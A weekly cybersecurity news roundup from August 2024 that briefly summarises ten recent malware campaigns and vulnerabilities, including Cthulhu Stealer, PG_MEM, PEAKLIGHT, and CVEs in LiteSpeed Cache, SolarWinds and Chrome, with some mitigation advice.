Weekly Top 10: 8.26.2024: Analyzing the Cthulhu Stealer Malware for macOS; PG_MEM: A Malware Hidden in the Postgres Processes; NUMOZYLOD Malware Distributed Through Popular Searches, and More.

WEEKLY TOP TEN: August 26, 2024, 16:00 GMT

1. Analyzing the Cthulhu Stealer Malware for macOS
   
   Cthulhu Stealer is a new info stealer designed for MacOS and is distributed as Malware-as-a-Service (MaaS). Researchers from Cado Security have taken a deep dive into its core functionality. The malware is initially distributed by masquerading as popular open-source software such as Adobe products or CleanMyMac. Once a victim attempts to install the .dmg file, they are prompted for their password. If the password is entered, the malware has access to Keychain and starts the exfiltration process.
2. PG_MEM: A Malware Hidden in the Postgres Processes
   
   Researchers at Aqua Security have found a new PostgreSQL malware called PG_MEM. The infection chain starts with a brute-force attack on a PostgreSQL DB. When successful, superuser accounts are created, which are then used to strip access to the original account. Using PostgreSQL commands, malicious files can be dropped and run. The threat actor will then drop PG_MEM, a malicious XMR cryptominer.
3. PEAKLIGHT: Decoding the Stealthy Memory-Only Malware
   
   Mandiant has discovered a memory-only malware dropper. This malware has been seen delivering multiple different MaaS infostealers, such as LUMMAC.v2, SHADOWLADDER, and CRPYTBOT. Initial access is gained by distributing a .LNK file disguised as a movie. These movies are distributed by pirating sites, and once the .LNK is executed, a PowerShell script is run, loading a memory-only javascript dropper. This dropper is obfuscated with ASCII characters. Then another PowerShell command is executed, this time encoded with either Base64 or Hex. These encoded commands download the final payload, which are multiple different MaaS infostealers.
4. NUMOZYLOD Malware Distributed Through Popular Searches
   
   NUMOZYLOD is a malicious PowerShell script; it is distributed by malvertisement, SEO poisoning, and typosquatting popular domains. Mandiant has attributed the malware to UNC4536, who run a MaaS operation. The threat actors have created typosquatted websites which are identical to the original, to distribute NUMOZYLOD. If a victim is tricked, they will unknowingly download the malware. UNC4536 uses MSIX, which is a Windows app package format to download Windows apps. MSIX allows threat actors to evade detection by bundling NUMOZYLOD into the Windows installer. The Powershell script has been seen installing a variety of different types of malware.
5. Hackers Are Exploiting Critical Bug in Litespeed Cache Plugin
   
   A critical vulnerability in a WordPress plugin, LiteSpeed Cache, is actively being exploited. Up to version 6.3.0.1 of LiteSpeed Cache, a weak hash check is what causes the vulnerability (CVE-2024-28000). The vulnerability was fixed in version 6.4, released on August 13th. That has not stopped hackers from attempting to exploit out-of-date sites. Security firm Wordfence has reported that over 48,000 attacks have been detected in the last 24 hours. Over 5 million WordPress sites use the plugin, and currently 63% of WordPress sites are using an outdated version.
6. Azure Kubernetes Services Vulnerability Exposed Sensitive Information
   
   A vulnerability was discovered by Mandiant in Azure Kubernetes Services cluster. The vulnerability impacts Kubernetes clusters without NetworkPolicies configurations in place. An attacker with command execution in a Pod could use the vulnerability to extract the transport layer security bootstrap tokens and use those tokens to read all of the secrets within the cluster. Once the attacker obtains the bootstrap tokens, they can create their own kubelet certificate for their workstation. Mandiant recommends adopting a process to create restrictive NetworkPolicies that only allow access to required services, which will prevent the entire attack chain.
7. Qilin Ransomware Now Steals Credentials From Chrome Browsers
   
   Researchers from Sophos have reported on a new tactic being used by ransomware group Qilin. Sophos has observed chrome harvesting techniques in the latest Qilin ransomware malware. The attackers distributed a PowerShell script with group policy, which harvested all credentials that were stored in Google Chrome. This change in tactics to exfiltrate stolen Chrome passwords across the domain will allow threat actors to stay in control, even after the ransomware is removed. One way to mitigate this risk is to manage Chrome and disallow the saving of passwords through the browser.
8. Hackers Now Use Appdomain Injection to Drop Cobaltstrike Beacons
   
   CISA has warned of a critical vulnerability in SolarWinds Web Help Desk tracked as CVE-2024-28986 with a CVSS score of 9.8. This vulnerability allows for unauthenticated remote code execution, leading to a complete system takeover. SolarWinds released a patch for this vulnerability but failed to mention that it has been exploited in the wild.
9. Google Releases Stable Channel Update for Desktop
   
   Google has released a new security update for Chrome, version 128. Notably in this update are 37 security fixes, including a patch for a zero-day that has been seen in the wild. The zero-day, CVE-2024-7971 is a type confusion in the V8 engine, with a base score of 8.8. There are five other high-vulnerability patches included in this update. Browsers are one of the largest attack surfaces; this has been the ninth actively exploited Chrome zero-day this year, so be sure to update.
10. New Backdoor Targeting Taiwan Employs Stealthy Communications
    
    A new backdoor named msupedge has been discovered by Symantec. This backdoor takes the form of a DLL, “wuplog.dll” and “wmiclnt.dll”, where duplog.dll is loaded by Apache. The backdoor uses DNS tunneling to communicate with the C2 server, a rarely used technique. When communicating over DNS, the C2 server sends commands to the backdoor using the third octet of the IP address. Depending on the IP, the backdoor will download files, create processes, or sleep. Symantec does not have enough evidence to determine the attribution or purpose of the backdoor at this time.